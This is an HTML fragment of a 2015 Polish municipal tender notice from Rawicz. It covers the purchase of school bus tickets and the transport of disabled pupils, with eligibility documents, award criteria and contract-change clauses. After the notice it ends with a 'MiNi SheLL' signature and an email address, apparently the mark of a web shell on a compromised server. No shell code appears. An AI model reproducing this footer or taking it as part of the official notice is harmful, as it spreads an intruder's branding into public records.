<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (w oryginale) (załącznik nr 1 do SIWZ).
2)	Zobowiązanie innych podmiotów  (w oryginale) oraz inne dokumenty (jeżeli Wykonawca korzysta z tych uprawnień) podpisane przez osoby uprawnione do reprezentacji podmiotu (zgodnie z KRS, CEIDG) lub podpisane przez osoby na podstawie udzielonego i załączonego do zobowiązania pełnomocnictwa.
3)	Oryginał pełnomocnictwa do reprezentowania lub kopia pełnomocnictwa poświadczona przez notariusza. (Pełnomocnictwo należy złożyć w przypadku gdy Wykonawcę w przetargu reprezentuje pełnomocnik jak również w przypadku Wykonawców wspólnie ubiegających się o zamówienie, którzy zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności - 1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności  powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i godzinami bez wprowadzenia zmian w wykazie  (np. zmiana godzin dowozu i odwozu, wprowadzenie zmiany organizacji ruchu na trasie przejazdu itd), 
2)	potrzeby wykonania usług zamiennych lub odstąpienia od realizacji części usług, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
3)	wystąpienia usług dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
4)	zmiany w wykazie tras, nazwy miejscowości-przystanków, godzin dowozu i odwozu - rozpoczęcia i zakończenia zajęć, zmiany ilości dzieci,  
5)	zmiany wysokości podatku VAT, 
6)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
7)	zmiana dotycząca zatrudnienia podwykonawców w przypadku gdy Wykonawca oświadczył, iż wykona umowę osobiście, w zakresie zgodnym ze SIWZ, zawartą umową  oraz zapisami wynikającymi z ustawy,   
8)	zmiana albo  rezygnacja  z podwykonawcy (podmiotu zobowiązanego) na którego  zasoby  wykonawca  powoływał się na zasadach określonych  w art. 26 ust. 2b, w celu wykazania spełnienia warunków  udziału  w postępowaniu , o których  mowa w art. 22 ust. 1,  na wniosek Wykonawcy uzasadniający taką zmianę, po wykazaniu przez Wykonawcę  iż proponowany  inny podwykonawca  lub wykonawca samodzielnie spełnia je w stopniu  nie mniejszym niż wymagany w trakcie  postępowania o udzielenie zamówienia.      
9)	zmiana podwykonawców oraz zakresu podwykonawstwa w przypadku gdy Wykonawca wykonuje umowę przy pomocy podwykonawców, po spełnieniu przesłanek wynikających z SIWZ, umowy oraz ustawy,   
10)	zmiana terminu realizacji zamówienia, 
11)	przekształcenie którejkolwiek ze stron umowy,
12)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
13)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
14)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 2 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2015 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu 65 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl  , 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - zakup biletów miesięcznych  dla uczniów dojeżdżających do Szkoły  Podstawowej nr 4  w Rawiczu,  Gimnazjum nr 1 w Rawiczu,  Szkoły Podstawowej w Zielonej Wsi  oraz Zespołu Szkół Specjalnych w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup biletów miesięcznych dla uczniów dojeżdżających  do Szkoły Podstawowej nr 4 w Rawiczu, Gimnazjum nr 1 w Rawiczu, Szkoły Podstawowej w Zielonej Wsi oraz Zespołu Szkół Specjalnych  w Rawiczu. Ilość dzieci 342..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - zakup biletów miesięcznych dla uczniów dojeżdżających do  Szkoły Podstawowej  nr 5 w Rawiczu, Gimnazjum nr 1 w Rawiczu, Gimnazjum w Sierakowie oraz Zespołu Szkół Specjalnych w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest zakup biletów miesięcznych  dla uczniów dojeżdżających do Szkoły Podstawowej nr 5 w Rawiczu, Gimnazjum nr 1 w Rawiczu, Gimnazjum w Sierakowie oraz Zespołu Szkół Specjalnych w Rawiczu. Ilość dzieci 431.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - dowóz uczniów niepełnosprawnych do Zespołu Szkół Specjalnych w Rawiczu  oraz do 	Przedszkola Nr 5 Oddziały Specjalne przy ul. Sarnowskiej 9A  w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz  9 dzieci  niepełnosprawnych  do Zespołu Szkół Specjalnych  w Rawiczu oraz do Przedszkola nr 5 Oddziały Specjalne w Rawiczu wraz z odwiezieniem ich do miejsca zamieszkania i zapewnieniem opieki podczas wykonywania zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com